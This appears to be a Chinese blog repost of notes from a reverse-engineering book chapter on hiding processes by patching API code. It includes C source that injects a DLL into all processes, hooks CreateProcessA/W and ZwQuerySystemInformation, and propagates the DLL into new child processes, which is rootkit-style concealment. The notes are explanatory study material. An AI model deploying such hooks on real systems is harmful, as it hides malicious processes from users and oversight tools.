2. 程式人生 > 實用技巧 >第33章:隱藏程序-API程式碼修改技術(中)

第33章:隱藏程序-API程式碼修改技術(中)

阿新 發佈:2020-08-06

全域性鉤取 API :

①Kernel32.CreatProcess() ,可以用來建立新程序,其它啟動執行程序的 API ( WinExec() , ShellExecute() , system() ) 在其內部也是呼叫此 API .

explorer.exe是 Windows 程式管理器或者檔案資源管理器,它用於管理 Windows 圖形殼,

包括桌面和檔案管理,刪除該程式會導致 Windows 圖形介面無法使用.

需要注意的是,這種尚未公開的 API 如果後期系統更新時發生了改變,就可能導致其無法生效.

此種方法也有問題,即無法對現在已經執行的程序進行隱藏,只能對未來的程序進行隱藏

.

HideProc2.cpp

int _tmain(int argc, TCHAR* argv[])
{
    int nMode = INJECTION_MODE;

    if( argc != 3 )
    {
        printf("\n Usage  : HideProc2.exe <-hide|-show> <dll path>\n\n");   // 少了 process name 這個引數.
        return 1;
    }

    // change privilege
    SetPrivilege(SE_DEBUG_NAME, TRUE);

    
 
// Inject(Eject) Dll to all process
    if( !_tcsicmp(argv[1], L"-show") )
        nMode = EJECTION_MODE;

    InjectAllProcess(nMode, argv[2]);

    return 0;
}

與前面的程式碼只有main()函式少了一點,其它的都一樣.

Stealth2.cpp

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    char            szCurProc[MAX_PATH] = {0
 
,};
    char            *p = NULL;

    // HideProc2.exe 不能注入自己
    GetModuleFileNameA(NULL, szCurProc, MAX_PATH);
    p = strrchr(szCurProc, '\\');
    if( (p != NULL) && !_stricmp(p+1, "HideProc2.exe") )
        return TRUE;

    // change privilege
    SetPrivilege(SE_DEBUG_NAME, TRUE);

    switch( fdwReason )
    {
        case DLL_PROCESS_ATTACH :           // 新增了對兩個函式的鉤取
            // hook
            hook_by_code("kernel32.dll", "CreateProcessA", 
                         (PROC)NewCreateProcessA, g_pOrgCPA);

            hook_by_code("kernel32.dll", "CreateProcessW", 
                         (PROC)NewCreateProcessW, g_pOrgCPW);

            hook_by_code("ntdll.dll", "ZwQuerySystemInformation", 
                         (PROC)NewZwQuerySystemInformation, g_pOrgZwQSI);
            break;

        case DLL_PROCESS_DETACH :
            // unhook
            unhook_by_code("kernel32.dll", "CreateProcessA", 
                           g_pOrgCPA);
            unhook_by_code("kernel32.dll", "CreateProcessW", 
                           g_pOrgCPW);
            unhook_by_code("ntdll.dll", "ZwQuerySystemInformation", 
                           g_pOrgZwQSI);
            break;
    }

    return TRUE;
}
BOOL WINAPI NewCreateProcessA(
    LPCTSTR lpApplicationName,
    LPTSTR lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,
    DWORD dwCreationFlags,
    LPVOID lpEnvironment,
    LPCTSTR lpCurrentDirectory,
    LPSTARTUPINFO lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation
)
{
    BOOL bRet;
    FARPROC pFunc;

    // unhook
    unhook_by_code("kernel32.dll", "CreateProcessA", g_pOrgCPA);

    // original API 呼叫
    pFunc = GetProcAddress(GetModuleHandleA("kernel32.dll"), "CreateProcessA");

    bRet = ((PFCREATEPROCESSA)pFunc)(lpApplicationName,
                                     lpCommandLine,
                                     lpProcessAttributes,
                                     lpThreadAttributes,
                                     bInheritHandles,
                                     dwCreationFlags,
                                     lpEnvironment,
                                     lpCurrentDirectory,
                                     lpStartupInfo,
                                     lpProcessInformation);

    // 向生成的子程序注入 stealth2.cpp 
    if( bRet )
        InjectDll2(lpProcessInformation->hProcess, STR_MODULE_NAME);  //CreatProcess 能直接獲取子程序的控制代碼.

    // hook
    hook_by_code("kernel32.dll", "CreateProcessA", 
                 (PROC)NewCreateProcessA, g_pOrgCPA);

    return bRet;
}

相關推薦

33:隱藏程序-API程式碼修改技術()

全域性鉤取 API : ①Kernel32.CreatProcess() ,可以用來建立新程序,其它啟動執行程序API ( WinExec() , ShellExecute() , system() ) 在其內部也是呼叫此 API .

33:隱藏程序-API程式碼修改技術(下)

前面的方法會頻繁的進行脫鉤和掛鉤操作,並且在多執行緒環境容易導致程式碼錯誤.因此使用 \"熱補丁\" 技術就很必要了.

【STM32F429開發板使用者手冊】33 STM32F429的SPI匯流排應用之驅動DAC8563(雙通道,16bit解析度,正負10V)

最新教程下載:http://www.armbbs.cn/forum.php?mod=viewthread&tid=93255 33 STM32F429的SPI匯流排應用之驅動DAC8563(雙通道,16bit解析度,正負10V)

34:高階全域性API鉤取 : IE連線控制

Win 7 Process explorer IE 瀏覽器所載入的 DLL 檔案: 如何檢視庫檔案的匯出函式:

uniapp 學集 ()常用API

寫在前面:分享技術,共同進步,有不足請見諒,相關意見可評論告知~ 有道無術,術尚可求;

:函式與程式碼複用

技術標籤:python 例項7:七段數碼管繪製 這是"例項"題,與課上講解例項相同,請作答檢驗學習效果。‪‬‪‬‪‬‪‬‪‬‮‬‫‬‫‬‪‬‪‬‪‬‪‬‪‬‮‬‪‬‪‬‪‬‪‬‪‬‪‬‪‬‮‬‫‬‪

【STM32F407的DSP教程】33 STM32F407不限制點數FFT實現

完整版教程下載地址:http://www.armbbs.cn/forum.php?mod=viewthread&tid=94547 33 STM32F407不限制點數FFT實現

【STM32F429的DSP教程】33 STM32F429不限制點數FFT實現

完整版教程下載地址:http://www.armbbs.cn/forum.php?mod=viewthread&tid=94547 33 STM32F429不限制點數FFT實現

File類與常用IO流——使用try...catch...finally處理流的異常

在JDK1.7之前: 1 package com.itheima.demo06.trycatch; 2 3 import java.io.FileWriter; 4 import java.io.IOException;

1 1.6 從結構化字串提取資料

一、例子: >>> import delorean >>> from decimal import Decimal >>>  >>> log = \'[2018-05-05T11:07:12.267897] - SALE - PRODUCT: 1345 - PRICE: $09.99\'

《作業系統導論》5 | 程序API

主要討論UNIX系統程序建立。UNIX系統採用了一種非常有趣的建立新程序的方式,即通過一對系統呼叫:fork()和exec()。程序還可以通過三個系統呼叫wait(),來等待其建立的子程序執行完成。

《Python資料分析與挖掘實戰》案例程式碼總結與修改分析

案例程式碼總結與修改分析 【有問題或錯誤,請私信我將及時改正;借鑑文章標明出處,謝謝】

《UNIX環境高階程式設計》(APUE) 筆記 - 程序控制

8 - 程序控制 Github 地址 1. 程序標識 每個程序都有一個非負整型表示的 唯一程序 ID 。程序 ID 是可複用的(延遲複用演算法)。

【STM32F407開發板使用者手冊】17 STM32F407之GPIO的HAL庫API

最新教程下載:http://www.armbbs.cn/forum.php?mod=viewthread&tid=93255 17 STM32F407之GPIO的HAL庫API

常用API(上)

4.1、Object類 描述:該類是所有類的最終根類 方法 描述 public boolean equals(Object obj)

【STM32F407開發板使用者手冊】23 STM32F407的USART串列埠基礎知識和HAL庫API

最新教程下載:http://www.armbbs.cn/forum.php?mod=viewthread&tid=93255 23 STM32F407的USART串列埠基礎知識和HAL庫API

【STM32F429開發板使用者手冊】23 STM32F429的USART串列埠基礎知識和HAL庫API

最新教程下載:http://www.armbbs.cn/forum.php?mod=viewthread&tid=93255 23 STM32F429的USART串列埠基礎知識和HAL庫API

【STM32F429開發板使用者手冊】25 STM32F429的TIM定時器基礎知識和HAL庫API

最新教程下載:http://www.armbbs.cn/forum.php?mod=viewthread&tid=93255 25 STM32F429的TIM定時器基礎知識和HAL庫API

【STM32F407開發板使用者手冊】31 STM32F407的SPI匯流排基礎知識和HAL庫API

最新教程下載:http://www.armbbs.cn/forum.php?mod=viewthread&tid=93255 31 STM32F407的SPI匯流排基礎知識和HAL庫API

【STM32F429開發板使用者手冊】31 STM32F429的SPI匯流排基礎知識和HAL庫API

最新教程下載:http://www.armbbs.cn/forum.php?mod=viewthread&tid=93255 31 STM32F429的SPI匯流排基礎知識和HAL庫API